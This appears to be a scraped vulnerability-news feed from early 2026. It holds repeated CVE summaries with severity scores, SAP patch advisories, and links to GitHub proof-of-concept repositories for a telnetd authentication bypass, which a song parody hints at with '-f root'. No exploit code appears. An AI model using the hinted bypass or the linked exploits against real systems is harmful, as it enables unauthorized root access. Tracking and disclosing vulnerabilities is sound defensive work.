https://github.com/franckferman/CVE_2026_24061_PoC
https://github.com/Ali-brarou/telnest
https://github.com/obrunolima1910/obrunolima1910.github.io
https://github.com/BrainBob/Telnet-TestVuln-CVE-2026-24061
https://github.com/duy-31/CVE-2026-24061---telnetd
https://github.com/Lingzesec/CVE-2026-24061-GUI
https://github.com/Moxxic1/Tell-Me-Root
https://github.com/0x7556/CVE-2026-24061
https://github.com/shivam-bathla/CVE-2026-24061-setup
https://github.com/JayGLXR/CVE-2026-24061-POC
https://github.com/dotelpenguin/telnetd_CVE-2026-24061_tester
I can't remember if I cried
When my `-f root` hit an ACL line
But something touched me deep inside…
The day the telnet died
On January 14, 2026, global telnet traffic observed by the GreyNoise Global Observation Grid fell off a cliff. A 59% sustained reduction, eighteen ASNs going completely silent, five countries vanishing (telnet-wise) from our data entirely. Six days later, CVE-2026-24061 dropped. Coincidence is one explanation.
https://www.labs.greynoise.io/grimoire/2026-02-10-telnet-falls-silent/
##~/CVE/CVE-2026-24061_telnetd
Analisi approfondita del CVE-2026-24061 telnetd exploit. Scopri come una mancata sanificazione in GNU InetUtils permetta l'ottenimento di privilegi...
🔗️ [Lobsec] https://link.is.it/6L9jY6
##I can't remember if I cried
When my `-f root` hit an ACL line
But something touched me deep inside…
The day the telnet died
On January 14, 2026, global telnet traffic observed by the GreyNoise Global Observation Grid fell off a cliff. A 59% sustained reduction, eighteen ASNs going completely silent, five countries vanishing (telnet-wise) from our data entirely. Six days later, CVE-2026-24061 dropped. Coincidence is one explanation.
https://www.labs.greynoise.io/grimoire/2026-02-10-telnet-falls-silent/
##~/CVE/CVE-2026-24061_telnetd
Analisi approfondita del CVE-2026-24061 telnetd exploit. Scopri come una mancata sanificazione in GNU InetUtils permetta l'ottenimento di privilegi...
🔗️ [Lobsec] https://link.is.it/6L9jY6
##updated 2026-02-10T15:30:34
4 posts
🟠 CVE-2025-6967 - High (8.7)
Execution After Redirect (EAR) vulnerability in Sarman Soft Software and Technology Services Industry and Trade Ltd. Co. CMS allows JSON Hijacking (aka JavaScript Hijacking), Authentication Bypass.This issue affects CMS: through 10022026.
NOTE: T...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-6967/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2025-6967 - High (8.7)
Execution After Redirect (EAR) vulnerability in Sarman Soft Software and Technology Services Industry and Trade Ltd. Co. CMS allows JSON Hijacking (aka JavaScript Hijacking), Authentication Bypass.This issue affects CMS: through 10022026.
NOTE: T...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-6967/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2025-6967 - High (8.7)
Execution After Redirect (EAR) vulnerability in Sarman Soft Software and Technology Services Industry and Trade Ltd. Co. CMS allows JSON Hijacking (aka JavaScript Hijacking), Authentication Bypass.This issue affects CMS: through 10022026.
NOTE: T...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-6967/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2025-6967 - High (8.7)
Execution After Redirect (EAR) vulnerability in Sarman Soft Software and Technology Services Industry and Trade Ltd. Co. CMS allows JSON Hijacking (aka JavaScript Hijacking), Authentication Bypass.This issue affects CMS: through 10022026.
NOTE: T...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-6967/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T15:22:54.740000
6 posts
SAP February 2026 Updates Patch Critical CRM, S/4HANA and NetWeaver Flaws
SAP's February 2026 Patch Tuesday addresses 27 security notes, including two critical vulnerabilities: CVE-2026-0488, code injection flaw in SAP CRM/S/4HANA enabling full database compromise, and CVE-2026-0509, missing authorization check in NetWeaver AS ABAP allowing unauthorized remote function calls.
**Make sure all SAP platforms are isolated from the internet and accessible from trusted networks only. Prioritize patching the CRM and S/4HANA Scripting Editor and NetWeaver Application Server ABAP critical vulnerabilities, then address the high-severity XML Signature Wrapping flaw in NetWeaver and the DoS issues in Supply Chain Management and BusinessObjects.**
#cybersecurity #infosec #advisory #vulnerability
https://beyondmachines.net/event_details/sap-february-2026-updates-patch-critical-crm-s-4hana-and-netweaver-flaws-m-7-v-w-t/gD2P6Ple2L
3674774 - [CVE-2026-0509] Missing Authorization check in SAP NetWeaver Application Server #ABAP and ABAP Platform
https://me.sap.com/notes/3674774
SAP February 2026 Updates Patch Critical CRM, S/4HANA and NetWeaver Flaws
SAP's February 2026 Patch Tuesday addresses 27 security notes, including two critical vulnerabilities: CVE-2026-0488, code injection flaw in SAP CRM/S/4HANA enabling full database compromise, and CVE-2026-0509, missing authorization check in NetWeaver AS ABAP allowing unauthorized remote function calls.
**Make sure all SAP platforms are isolated from the internet and accessible from trusted networks only. Prioritize patching the CRM and S/4HANA Scripting Editor and NetWeaver Application Server ABAP critical vulnerabilities, then address the high-severity XML Signature Wrapping flaw in NetWeaver and the DoS issues in Supply Chain Management and BusinessObjects.**
#cybersecurity #infosec #advisory #vulnerability
https://beyondmachines.net/event_details/sap-february-2026-updates-patch-critical-crm-s-4hana-and-netweaver-flaws-m-7-v-w-t/gD2P6Ple2L
🛡️ CRITICAL: CVE-2026-0509 in SAP NetWeaver ABAP (7.22 – 9.19) lets authenticated users run unauthorized background RFCs, risking integrity & availability. Patch when available, restrict S_RFC, monitor RFC usage. Details: https://radar.offseq.com/threat/cve-2026-0509-cwe-862-missing-authorization-in-sap-3bdb181d #OffSeq #SAP #CVE20260509 #infosec
##🔴 CVE-2026-0509 - Critical (9.6)
SAP NetWeaver Application Server ABAP and ABAP Platform allows an authenticated, low-privileged user to perform background Remote Function Calls without the required S_RFC authorization in certain cases. This can result in a high impact on integri...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-0509/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🔴 CVE-2026-0509 - Critical (9.6)
SAP NetWeaver Application Server ABAP and ABAP Platform allows an authenticated, low-privileged user to perform background Remote Function Calls without the required S_RFC authorization in certain cases. This can result in a high impact on integri...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-0509/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T15:22:54.740000
5 posts
‼️ XML Signature Wrapping Vulnerability in SAP NetWeaver ABAP Enables Identity Tampering and Unauthorized Access (CVE-2026-23687)
##‼️ XML Signature Wrapping Vulnerability in SAP NetWeaver ABAP Enables Identity Tampering and Unauthorized Access (CVE-2026-23687)
##🟠 CVE-2026-23687 - High (8.8)
SAP NetWeaver Application Server ABAP and ABAP Platform allows an authenticated attacker with normal privileges to obtain a valid signed message and send modified signed XML documents to the verifier. This may result in acceptance of tampered iden...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-23687/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-23687 - High (8.8)
SAP NetWeaver Application Server ABAP and ABAP Platform allows an authenticated attacker with normal privileges to obtain a valid signed message and send modified signed XML documents to the verifier. This may result in acceptance of tampered iden...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-23687/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-23687 - High (8.8)
SAP NetWeaver Application Server ABAP and ABAP Platform allows an authenticated attacker with normal privileges to obtain a valid signed message and send modified signed XML documents to the verifier. This may result in acceptance of tampered iden...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-23687/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T15:22:54.740000
2 posts
🟠 CVE-2025-40587 - High (7.6)
A vulnerability has been identified in Polarion V2404 (All versions < V2404.5), Polarion V2410 (All versions < V2410.2). The affected application allows arbitrary JavaScript code be included in document titles. This could allow an authentica...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-40587/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2025-40587 - High (7.6)
A vulnerability has been identified in Polarion V2404 (All versions < V2404.5), Polarion V2410 (All versions < V2410.2). The affected application allows arbitrary JavaScript code be included in document titles. This could allow an authentica...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-40587/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T15:22:54.740000
2 posts
🟠 CVE-2026-25656 - High (7.8)
A vulnerability has been identified in SINEC NMS (All versions), User Management Component (UMC) (All versions < V2.15.2.1). The affected application permits improper modification of a configuration file by a low-privileged user.
This could al...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-25656/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-25656 - High (7.8)
A vulnerability has been identified in SINEC NMS (All versions), User Management Component (UMC) (All versions < V2.15.2.1). The affected application permits improper modification of a configuration file by a low-privileged user.
This could al...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-25656/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T15:22:54.740000
2 posts
🔴 CVE-2025-11242 - Critical (9.8)
Server-Side Request Forgery (SSRF) vulnerability in Teknolist Computer Systems Software Publishing Industry and Trade Inc. Okulistik allows Server Side Request Forgery.This issue affects Okulistik: through 21102025.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-11242/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🔴 CVE-2025-11242 - Critical (9.8)
Server-Side Request Forgery (SSRF) vulnerability in Teknolist Computer Systems Software Publishing Industry and Trade Inc. Okulistik allows Server Side Request Forgery.This issue affects Okulistik: through 21102025.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-11242/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T15:22:54.740000
4 posts
🟠 CVE-2026-2094 - High (8.8)
Docpedia developed by Flowring has a SQL Injection vulnerability, allowing authenticated remote attackers to inject arbitrary SQL commands to read, modify, and delete database contents.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-2094/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-2094 - High (8.8)
Docpedia developed by Flowring has a SQL Injection vulnerability, allowing authenticated remote attackers to inject arbitrary SQL commands to read, modify, and delete database contents.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-2094/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-2094 - High (8.8)
Docpedia developed by Flowring has a SQL Injection vulnerability, allowing authenticated remote attackers to inject arbitrary SQL commands to read, modify, and delete database contents.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-2094/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-2094 - High (8.8)
Docpedia developed by Flowring has a SQL Injection vulnerability, allowing authenticated remote attackers to inject arbitrary SQL commands to read, modify, and delete database contents.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-2094/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T15:22:54.740000
1 posts
🟠 CVE-2026-2093 - High (7.5)
Docpedia developed by Flowring has a SQL Injection vulnerability, allowing unauthenticated remote attackers to inject arbitrary SQL commands to read database contents.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-2093/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T15:22:54.740000
1 posts
🟠 CVE-2026-0485 - High (7.5)
SAP BusinessObjects BI Platform allows an unauthenticated attacker to send specially crafted requests that could cause the Content Management Server (CMS) to crash and automatically restart. By repeatedly submitting these requests, the attacker co...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-0485/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T15:22:54.740000
1 posts
🟠 CVE-2025-15310 - High (7.8)
Tanium addressed a local privilege escalation vulnerability in Patch Endpoint Tools.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-15310/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T15:22:54.740000
1 posts
🟠 CVE-2026-25890 - High (8.1)
File Browser provides a file managing interface within a specified directory and it can be used to upload, delete, preview, rename and edit files. Prior to 2.57.1, an authenticated user can bypass the application's "Disallow" file path rules by mo...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-25890/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T15:22:54.740000
1 posts
1 repos
https://github.com/mbanyamer/CVE-2026-25961-SumatraPDF-3.5.0---3.5.2-RCE
🟠 CVE-2026-25961 - High (7.5)
SumatraPDF is a multi-format reader for Windows. In 3.5.0 through 3.5.2, SumatraPDF's update mechanism disables TLS hostname verification (INTERNET_FLAG_IGNORE_CERT_CN_INVALID) and executes installers without signature checks. A network attacker w...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-25961/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T15:02:32.033000
2 posts
🟠 CVE-2026-24684 - High (7.5)
FreeRDP is a free implementation of the Remote Desktop Protocol. Prior to 3.22.0, the RDPSND async playback thread can process queued PDUs after the channel is closed and internal state is freed, leading to a use after free in rdpsnd_treat_wave. T...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-24684/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-24684 - High (7.5)
FreeRDP is a free implementation of the Remote Desktop Protocol. Prior to 3.22.0, the RDPSND async playback thread can process queued PDUs after the channel is closed and internal state is freed, leading to a use after free in rdpsnd_treat_wave. T...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-24684/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T12:30:34
2 posts
🟠 CVE-2026-23720 - High (7.8)
A vulnerability has been identified in Simcenter Femap (All versions < V2512), Simcenter Nastran (All versions < V2512). The affected applications contains an out of bounds read vulnerability while parsing specially crafted NDB files. This c...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-23720/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-23720 - High (7.8)
A vulnerability has been identified in Simcenter Femap (All versions < V2512), Simcenter Nastran (All versions < V2512). The affected applications contains an out of bounds read vulnerability while parsing specially crafted NDB files. This c...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-23720/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T12:30:34
2 posts
1 repos
🟠 CVE-2026-2268 - High (7.5)
The Ninja Forms plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 3.14.0. This is due to the unsafe application of the `ninja_forms_merge_tags` filter to user-supplied input within repeater ...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-2268/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-2268 - High (7.5)
The Ninja Forms plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 3.14.0. This is due to the unsafe application of the `ninja_forms_merge_tags` filter to user-supplied input within repeater ...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-2268/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T12:30:33
2 posts
🟠 CVE-2026-22923 - High (7.8)
A vulnerability has been identified in NX (All versions < V2512). The affected application contains a data validation vulnerability that could allow an attacker with local access to interfere with internal data during the PDF export process tha...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-22923/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-22923 - High (7.8)
A vulnerability has been identified in NX (All versions < V2512). The affected application contains a data validation vulnerability that could allow an attacker with local access to interfere with internal data during the PDF export process tha...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-22923/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T12:30:33
2 posts
🟠 CVE-2026-25655 - High (7.8)
A vulnerability has been identified in SINEC NMS (All versions < V4.0 SP2). The affected application permits improper modification of a configuration file by a low-privileged user.
This could allow an attacker to load malicious DLLs, potential...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-25655/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-25655 - High (7.8)
A vulnerability has been identified in SINEC NMS (All versions < V4.0 SP2). The affected application permits improper modification of a configuration file by a low-privileged user.
This could allow an attacker to load malicious DLLs, potential...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-25655/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T12:30:28
2 posts
🟠 CVE-2026-23719 - High (7.8)
A vulnerability has been identified in Simcenter Femap (All versions < V2512), Simcenter Nastran (All versions < V2512). The affected application is vulnerable to heap-based buffer overflow while parsing specially crafted NDB files. This cou...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-23719/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-23719 - High (7.8)
A vulnerability has been identified in Simcenter Femap (All versions < V2512), Simcenter Nastran (All versions < V2512). The affected application is vulnerable to heap-based buffer overflow while parsing specially crafted NDB files. This cou...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-23719/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T12:30:28
2 posts
🟠 CVE-2026-23718 - High (7.8)
A vulnerability has been identified in Simcenter Femap (All versions < V2512), Simcenter Nastran (All versions < V2512). The affected applications contains an out of bounds read vulnerability while parsing specially crafted NDB files. This c...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-23718/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-23718 - High (7.8)
A vulnerability has been identified in Simcenter Femap (All versions < V2512), Simcenter Nastran (All versions < V2512). The affected applications contains an out of bounds read vulnerability while parsing specially crafted NDB files. This c...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-23718/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T12:30:28
2 posts
🟠 CVE-2026-23716 - High (7.8)
A vulnerability has been identified in Simcenter Femap (All versions < V2512), Simcenter Nastran (All versions < V2512). The affected applications contains an out of bounds read vulnerability while parsing specially crafted XDB files. This c...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-23716/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-23716 - High (7.8)
A vulnerability has been identified in Simcenter Femap (All versions < V2512), Simcenter Nastran (All versions < V2512). The affected applications contains an out of bounds read vulnerability while parsing specially crafted XDB files. This c...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-23716/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T12:30:27
2 posts
🟠 CVE-2026-23715 - High (7.8)
A vulnerability has been identified in Simcenter Femap (All versions < V2512), Simcenter Nastran (All versions < V2512). The affected applications contains an out of bounds write vulnerability while parsing specially crafted XDB files. This ...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-23715/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-23715 - High (7.8)
A vulnerability has been identified in Simcenter Femap (All versions < V2512), Simcenter Nastran (All versions < V2512). The affected applications contains an out of bounds write vulnerability while parsing specially crafted XDB files. This ...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-23715/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T09:30:31
3 posts
🚨 CVE-2026-2095: CRITICAL auth bypass in all Flowring Agentflow versions. Remote attackers can impersonate any user — no patch available. Restrict access & monitor for abnormal logins. https://radar.offseq.com/threat/cve-2026-2095-cwe-288-authentication-bypass-using--1f37d3de #OffSeq #Cybersecurity #Vulnerability #Agentflow
##🔴 CVE-2026-2095 - Critical (9.8)
Agentflow developed by Flowring has an Authentication Bypass vulnerability, allowing unauthenticated remote attackers to exploit a specific functionality to obtain arbitrary user authentication token and log into the system as any user.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-2095/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🔴 CVE-2026-2095 - Critical (9.8)
Agentflow developed by Flowring has an Authentication Bypass vulnerability, allowing unauthenticated remote attackers to exploit a specific functionality to obtain arbitrary user authentication token and log into the system as any user.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-2095/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T09:30:31
5 posts
🚨 CRITICAL vuln: CVE-2026-2096 in Flowring Agentflow (all versions). Unauthenticated attackers can read, modify, or delete DB contents due to authentication bypass. No fix yet — restrict access! https://radar.offseq.com/threat/cve-2026-2096-cwe-288-authentication-bypass-using--10f90ea1 #OffSeq #Vulnerability #Agentflow #InfoSec
##🔴 CVE-2026-2096 - Critical (9.8)
Agentflow developed by Flowring has a Missing Authentication vulnerability, allowing unauthenticated remote attackers to read, modify, and delete database contents by using a specific functionality.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-2096/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🔴 CVE-2026-2096 - Critical (9.8)
Agentflow developed by Flowring has a Missing Authentication vulnerability, allowing unauthenticated remote attackers to read, modify, and delete database contents by using a specific functionality.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-2096/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🔴 CVE-2026-2096 - Critical (9.8)
Agentflow developed by Flowring has a Missing Authentication vulnerability, allowing unauthenticated remote attackers to read, modify, and delete database contents by using a specific functionality.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-2096/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🔴 CVE-2026-2096 - Critical (9.8)
Agentflow developed by Flowring has a Missing Authentication vulnerability, allowing unauthenticated remote attackers to read, modify, and delete database contents by using a specific functionality.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-2096/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T09:30:31
4 posts
🟠 CVE-2026-2097 - High (8.8)
Agentflow developed by Flowring has an Arbitrary File Upload vulnerability, allowing authenticated remote attackers to upload and execute web shell backdoors, thereby enabling arbitrary code execution on the server.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-2097/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-2097 - High (8.8)
Agentflow developed by Flowring has an Arbitrary File Upload vulnerability, allowing authenticated remote attackers to upload and execute web shell backdoors, thereby enabling arbitrary code execution on the server.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-2097/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-2097 - High (8.8)
Agentflow developed by Flowring has an Arbitrary File Upload vulnerability, allowing authenticated remote attackers to upload and execute web shell backdoors, thereby enabling arbitrary code execution on the server.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-2097/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-2097 - High (8.8)
Agentflow developed by Flowring has an Arbitrary File Upload vulnerability, allowing authenticated remote attackers to upload and execute web shell backdoors, thereby enabling arbitrary code execution on the server.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-2097/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T06:30:45
2 posts
🟠 CVE-2026-24322 - High (7.7)
SAP Solution Tools Plug-In (ST-PI) contains a function module that does not perform the necessary authorization checks for authenticated users, allowing sensitive information to be disclosed. This vulnerability has a high impact on confidentiality...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-24322/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-24322 - High (7.7)
SAP Solution Tools Plug-In (ST-PI) contains a function module that does not perform the necessary authorization checks for authenticated users, allowing sensitive information to be disclosed. This vulnerability has a high impact on confidentiality...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-24322/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T06:30:44
1 posts
🟠 CVE-2026-23689 - High (7.7)
Due to an uncontrolled resource consumption (Denial of Service) vulnerability, an authenticated attacker with regular user privileges and network access can repeatedly invoke a remote-enabled function module with an excessively large loop-control ...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-23689/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T06:30:40
1 posts
🟠 CVE-2025-11547 - High (7.8)
AXIS Camera Station Pro contained a flaw to perform a privilege escalation attack on the server as a non-admin user.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-11547/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T06:30:39
1 posts
🟠 CVE-2026-0490 - High (7.5)
SAP BusinessObjects BI Platform allows an unauthenticated attacker to craft a specific network request to the trusted endpoint that breaks the authentication, which prevents the legitimate users from accessing the platform. As a result, it has a h...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-0490/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T06:30:38
3 posts
SAP February 2026 Updates Patch Critical CRM, S/4HANA and NetWeaver Flaws
SAP's February 2026 Patch Tuesday addresses 27 security notes, including two critical vulnerabilities: CVE-2026-0488, code injection flaw in SAP CRM/S/4HANA enabling full database compromise, and CVE-2026-0509, missing authorization check in NetWeaver AS ABAP allowing unauthorized remote function calls.
**Make sure all SAP platforms are isolated from the internet and accessible from trusted networks only. Prioritize patching the CRM and S/4HANA Scripting Editor and NetWeaver Application Server ABAP critical vulnerabilities, then address the high-severity XML Signature Wrapping flaw in NetWeaver and the DoS issues in Supply Chain Management and BusinessObjects.**
#cybersecurity #infosec #advisory #vulnerability
https://beyondmachines.net/event_details/sap-february-2026-updates-patch-critical-crm-s-4hana-and-netweaver-flaws-m-7-v-w-t/gD2P6Ple2L
SAP February 2026 Updates Patch Critical CRM, S/4HANA and NetWeaver Flaws
SAP's February 2026 Patch Tuesday addresses 27 security notes, including two critical vulnerabilities: CVE-2026-0488, code injection flaw in SAP CRM/S/4HANA enabling full database compromise, and CVE-2026-0509, missing authorization check in NetWeaver AS ABAP allowing unauthorized remote function calls.
**Make sure all SAP platforms are isolated from the internet and accessible from trusted networks only. Prioritize patching the CRM and S/4HANA Scripting Editor and NetWeaver Application Server ABAP critical vulnerabilities, then address the high-severity XML Signature Wrapping flaw in NetWeaver and the DoS issues in Supply Chain Management and BusinessObjects.**
#cybersecurity #infosec #advisory #vulnerability
https://beyondmachines.net/event_details/sap-february-2026-updates-patch-critical-crm-s-4hana-and-netweaver-flaws-m-7-v-w-t/gD2P6Ple2L
🔴 CVE-2026-0488 - Critical (9.9)
An authenticated attacker in SAP CRM and SAP S/4HANA (Scripting Editor) could exploit a flaw in a generic function module call and execute unauthorized critical functionalities, which includes the ability to execute an arbitrary SQL statement. Thi...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-0488/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T02:57:34
1 posts
🟠 CVE-2026-25958 - High (7.7)
Cube is a semantic layer for building data applications. From 0.27.19 to before 1.5.13, 1.4.2, and 1.0.14, it is possible to make a specially crafted request with a valid API token that leads to privilege escalation. This vulnerability is fixed in...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-25958/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T02:56:59
1 posts
1 repos
https://github.com/mbanyamer/CVE-2026-25939-SCADA-FUXA-Unauthenticated-Remote-Arbitrary
🔔 CVE-2026-25939: CRITICAL auth bypass in frangoteam FUXA (<1.2.11). Unauthenticated attackers can modify schedulers — risking ICS/SCADA disruption. Patch to 1.2.11+ now! https://radar.offseq.com/threat/cve-2026-25939-cwe-862-missing-authorization-in-fr-75e34d8a #OffSeq #ICS #Vulnerability #SCADA
##updated 2026-02-10T02:56:34
1 posts
🔴 CVE-2026-25881 - Critical (9)
SandboxJS is a JavaScript sandboxing library. Prior to 0.8.31, a sandbox escape vulnerability allows sandboxed code to mutate host built-in prototypes by laundering the isGlobal protection flag through array literal intermediaries. When a global p...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-25881/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T02:56:05
1 posts
🟠 CVE-2026-25892 - High (7.5)
Adminer is open-source database management software. Adminer v5.4.1 and earlier has a version check mechanism where adminer.org sends signed version info via JavaScript postMessage, which the browser then POSTs to ?script=version. This endpoint la...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-25892/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T00:30:37
1 posts
🟠 CVE-2025-15319 - High (7.8)
Tanium addressed a local privilege escalation vulnerability in Endpoint Configuration Toolset Solution.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-15319/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-09T22:39:51
1 posts
🟠 CVE-2026-25791 - High (7.5)
Sliver is a command and control framework that uses a custom Wireguard netstack. Prior to 1.7.0, the DNS C2 listener accepts unauthenticated TOTP bootstrap messages and allocates server-side DNS sessions without validating OTP values, even when En...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-25791/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
